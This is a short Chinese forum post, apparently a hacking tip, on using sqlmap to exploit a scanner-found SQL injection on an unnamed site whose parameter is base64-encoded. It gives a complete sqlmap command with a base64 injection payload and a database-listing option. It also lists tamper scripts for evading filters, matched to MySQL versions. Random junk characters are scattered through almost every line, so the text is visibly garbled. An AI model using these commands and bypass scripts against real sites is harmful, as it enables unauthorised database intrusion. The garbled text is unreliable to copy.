WVS扫某站就出来一个SQL Injection,参数还是base64编码的,手工注入麻烦一步,用sqlmap怎么自动注射呢?3 z F9 K8 w: L9 a1 |
! M+ H' T, t! H# j8 X |sqlmap的tamper里有个base64encode.py
; w6 u- s. c3 }- q, z' m8 [! T% \+ Q9 {- M. X1 j: g1 b; F
使用如下2 }3 o! v* q% y0 F# |
8 q+ q; ]- X9 e; {" i# A- a+ `
sqlmap -u http://ha.cker.in/index.php?tel=LTEnIG9yICc4OCc9Jzg5 --tamper base64encode.py –dbs
4 w/ P o, M0 ]/ `7 D( @" }, H" F; r
+ Z0 ^$ V3 t- y: C! |+ Z3 b
sqlmap拥有很多功能强力的插件,插件的使用方法: -- tamper “插件名称”
1 {- P* b) _5 p" w3 o2 Q, [, Q4 R" E# G/ t: t+ L: S1 O
其中常用到的bypass脚本绕过SQLMAP主要两个脚本:
/ z) M( U; `! i1 q% I( {7 u. s
- a8 j8 A- t, S( q4 ^4 gspace2hash.py ,对于MYSQL数据库 4.0, 5.0注入 h, R8 k! ?+ Y& k9 U3 U0 R
space2morehash.py ,对于MYSQL数据库 >= 5.1.13 和 MySQL 5.1.41 注入
5 l4 T) ]& ~1 m, B- f/ [9 C首先确定目标数据库版本,然后选择相应的脚本。0 J" D8 {/ W' o3 o
-v 3 --batch --tamper "space2hash.py"6 d5 p+ G$ O1 J& C. ?
5 f% Z" y* t3 e3 v还有其他一些插件:
8 \9 U, w, G& i P, N" nencodes编码 ——charencode.py$ g$ ?9 u" H0 A# l# H
base64编码 —— base64encode.py
1 I1 J5 X7 }+ Z/ y替换空格和关键字 —— halfversionedmorekeywords.py3 k5 M2 c9 e9 n6 x, X" K
|
0 N1 ~4 M" h4 o" T1 @2 [" d5 ?1 q. y0 J7 C, x
) b: z% y3 s! K5 R. b/ O* c0 v6 _# D* q! U4 g. \/ Z3 }# B n+ h
|